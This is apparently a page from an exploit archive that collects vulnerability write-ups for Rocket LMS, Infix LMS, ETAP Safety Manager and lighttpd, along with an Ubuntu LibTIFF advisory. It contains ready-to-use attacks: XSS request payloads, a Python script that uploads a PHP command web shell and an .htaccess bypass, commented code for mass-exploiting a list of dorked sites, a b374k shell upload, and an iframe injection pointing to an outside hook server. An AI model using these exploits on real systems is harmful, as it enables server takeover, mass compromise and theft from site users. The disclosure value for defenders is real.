Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04-------Request-----------GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3DConnection: close

Rocket LMS 1.6 Cross Site Scripting

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

Ubuntu Security Notice 5523-2 - USN-5523-1 fixed several vulnerabilities in LibTIFF. This update provides the fixes for CVE-2022-0907, CVE-2022-0908, CVE-2022-0909, CVE-2022-0924 and CVE-2022-22844 for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. It was discovered that LibTIFF was not properly performing checks to guarantee that allocated memory space existed, which could lead to a NULL pointer dereference via a specially crafted file. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5523-2  
September 12, 2022

tiff vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in LibTIFF.

Software Description:  
- tiff: Tag Image File Format (TIFF) library

Details:

USN-5523-1 fixed several vulnerabilities in LibTIFF. This update  
provides the fixes for CVE-2022-0907, CVE-2022-0908, CVE-2022-0909,  
CVE-2022-0924 and CVE-2022-22844 for Ubuntu 18.04 LTS and  
Ubuntu 20.04 LTS.

Original advisory details:

  It was discovered that LibTIFF was not properly perf   orming checks to  
  guarantee that allocated memory space existed, which could lead to a  
  NULL pointer dereference via a specially crafted file. An attacker  
  could possibly use this issue to cause a denial of service.  
  (CVE-2022-0907, CVE-2022-0908)

  It was discovered that LibTIFF was not properly performing checks to  
  avoid division calculations where the denominator value was zero,  
  which could lead to an undefined behavior situation via a specially  
  crafted file. An attacker could possibly use this issue to cause a  
  denial of service. (CVE-2022-0909)

  It was discovered that LibTIFF was not properly performing bounds  
  checks, which could lead to an out-of-bounds read via a specially  
  crafted file. An attacker could possibly use this issue to cause a  
  denial of service or to expose sensitive information. (CVE-2022-0924)

  It was discovered that LibTIFF was not properly performing the  
  calculation of data that would eventually be used as a reference for  
  bounds checking operations, which could lead to an out-of-bounds  
  read via a specially crafted file. An attacker could possibly use  
  this issue to cause a denial of service or to expose sensitive  
  information. (CVE-2020-19131)

  It was discovered that LibTIFF was not properly terminating a  
  function execution when processing incorrect data, which could lead  
  to an out-of-bounds read via a specially crafted file. An attacker  
  could possibly use this issue to cause a denial of service or to  
  expose sensitive information. (CVE-2020-19144)

  It was discovered that LibTIFF was not properly performing checks  
  when setting the value for data later used as reference during memory  
  access, which could lead to an out-of-bounds read via a specially  
  crafted file. An attacker could possibly use this issue to cause a  
  denial of service or to expose sensitive information.  
  (CVE-2022-22844)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   libtiff-opengl                  4.1.0+git191117-2ubuntu0.20.04.4  
   libtiff-tools                   4.1.0+git191117-2ubuntu0.20.04.4  
   libtiff5                        4.1.0+git191117-2ubuntu0.20.04.4  
   libtiffxx5                      4.1.0+git191117-2ubuntu0.20.04.4

Ubuntu 18.04 LTS:  
   libtiff-opengl                  4.0.9-5ubuntu0.6  
   libtiff-tools                   4.0.9-5ubuntu0.6  
   libtiff5                        4.0.9-5ubuntu0.6  
   libtiffxx5                      4.0.9-5ubuntu0.6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5523-2  
   https://ubuntu.com/security/notices/USN-5523-1  
   CVE-2022-0907, CVE-2022-0908, CVE-2022-0909, CVE-2022-0924,  
   CVE-2022-22844

Package Information:  
https://launchpad.net/ubuntu/+source/tiff/4.1.0+git191117-2ubuntu0.20.04.4  
   https://launchpad.net/ubuntu/+source/tiff/4.0.9-5ubuntu0.6

Ubuntu Security Notice USN-5523-2

ETAP Safety Manager version 1.0.0.32 suffers from a cross site scripting vulnerability.

    ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSSVendor: ETAP Lighting International NVProduct web page: https://www.etaplighting.comAffected version: 1.0.0.32Summary: The ETAP Safety Manager (ESM) is a central managing and controlsystem that helps you to monitor, adjust and maintain your emergency lightingsystem. Therefore each luminaire connected to your ESM network is given aunique code. The ESM can easily identify the luminaires individually andautomatically report whether all luminaires work properly. You can eitherchoose between a wired or wireless network, or a combination of both. WithESM you will not only manage your self contained or your centrally supplied‘ETAP Battery System’ (EBS) emergency luminaires’, but also DALI emergencyunits and K9 LED modules, which you can build into your luminaires. Sinceyour ESM system is connected to the Internet, you will always have accessto it through the World Wide Web. ESMweb™ is an ‘embedded web server’application for monitoring an emergency lighting system, which runs in the‘ESM web controller’. The ESMweb™ application can be accessed from any PCin the corporate network or connected to the Internet - by a standard webbrowser.Desc: Input passed to the GET parameter 'action' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.41 (Ubuntu)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5711Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5711.php22.08.2022--PoC:GET /json/authenticate.php?action=[XSS]&username=waddup&password=nm HTTP/1.1{"success":false,"errorMessage":"Invalid command: $","errorCode":0,"errorInfo":"\/var\/www\/etap-root\/scripts\/class.dispatch.php(39)","rows":[]}

ETAP Safety Manager 1.0.0.32 Cross Site Scripting

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection  
# Exploit Author: th3d1gger  
# Vendor Homepage: https://codecanyon.net  
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608  
# Version: 4.3.0  
# Tested on Ubuntu 18.04  
sign up as teacher  
go course page and try to add course or edit  
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request--  
POST /admin/course/updateCourse HTTP/1.1  
Host: localhost  
Content-Length: 3855  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/admin/course/course-details/7?type=courseDetails  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D  
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="drip"

0  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="id"

7  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="about"

<p><p><br></p><p><br></p><p><br></p></p><p><p><iframe src="http://192.168.1.18:3000/uploads/test.html"></p></p><div><br></div><p><br></p><p><br></p><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text  
            ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="category"

4  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="sub_category"

7  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="mode_of_delivery"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="level"

2  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="language"

19  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="duration"

10  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="complete_order"

0  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="price"

20  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="is_discount"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="discount_price"

10  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="host"

Youtube  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="file"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="scope"

1  
------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="image"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

In lighttpd 1.4.65, mod_wstunnel does not initialize a handler function pointer if an invalid HTTP request (websocket handshake) is received. It leads to null pointer dereference which crashes the server. It could be used by an external attacker to cause denial of service condition.

There's a null pointer dereference bug that crashes the whole server if mod\_wstunnel is enabled and the server receives invalid HTTP Websocket Handshake request. This issue could be abused by a remote attacker to cause Denial of Service condition.

The vulnerability was detected on Ubuntu 22.04 x86\_64:  
\- lighttpd 1.4.65 built from source  
\- lighttpd 1.4.63 installed from ubuntu repository  
\- lighttpd 1.4.66 from github (master, 5d80e41ab2585288b0bbe0ebf8f3e3b120a0f403)

In the "wstunnel\_handler\_setup" function, the server verifies a request and if it's valid, it initializes handler functions. If the request has invalid (not a number) value in the "Sec-WebSocket-Version" header, it sets http status to 400 and exits the function without setting "hctx->create\_env" function pointer. Then, the server reaches to the "gw\_write\_request" function where it tries to call "hctx->create\_env(hctx)", however, the "hctx->create\_env" value is null leading to crash.

mod\_wstunnel.c:  

    static handler_t wstunnel_handler_setup (request_st * const r, plugin_data * const p) {
        handler_ctx *hctx = r->plugin_ctx[p->id];
        int hybivers;
        hctx->errh = r->conf.errh;/*(for mod_wstunnel-specific DEBUG_* macros)*/
        hctx->conf = p->conf; /*(copies struct)*/
        hybivers = wstunnel_check_request(r, hctx);
        if (hybivers < 0) return HANDLER_FINISHED;
       [...]
        hctx->gw.create_env       = wstunnel_create_env;
        hctx->gw.handler_ctx_free = wstunnel_handler_ctx_free;
    
    

    static int wstunnel_check_request(request_st * const r, handler_ctx * const hctx) {
        const buffer * const vers =
          http_header_request_get(r, HTTP_HEADER_OTHER, CONST_STR_LEN("Sec-WebSocket-Version"));
        const long hybivers = (NULL != vers)
          ? light_isdigit(*vers->ptr) ? strtol(vers->ptr, NULL, 10) : -1
          : 0;
        if (hybivers < 0 || hybivers > INT_MAX) {
            DEBUG_LOG_ERR("%s", "invalid Sec-WebSocket-Version");
            r->http_status = 400; /* Bad Request */
            return -1;
        }
    
    

gw\_backend.c:  

    static handler_t gw_write_request(gw_handler_ctx * const hctx, request_st * const r) {
        switch(hctx->state) {
    [...]
        case GW_STATE_PREPARE_WRITE:
            /* ok, we have the connection */
    
            {
                handler_t rc = hctx->create_env(hctx);
                if (HANDLER_GO_ON != rc) {
    
    

**PoC:**

1\. Download and build the server from source:  

$ wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.65.tar.gz
$ tar zxf lighttpd-1.4.65.tar.gz 
$ cd lighttpd-1.4.65/
$ cmake -DCMAKE\_INSTALL\_PREFIX=/usr/local -Wno-dev .
$ make -j 4
$ sudo make install

2\. Prepare configuration

/home/osboxes/echo.pl:  

#!/usr/bin/perl -Tw
$SIG{PIPE} = 'IGNORE';
for (my $FH; accept($FH, STDIN); close $FH) {
    select($FH); $|=1; # $FH->autoflush;
    print $FH $\_ while (<$FH>);
}

/home/osboxes/webroot/ws.html:  

<!DOCTYPE html>

<pre id="log"></pre>
    <script>
          // helper function: log message to screen
          var logelt = document.getElementById('log');
  function log(msg) { logelt.textContent += msg + '\\n'; }
  // helper function: send websocket msg with count (1 .. 5)
  var ll = 0;
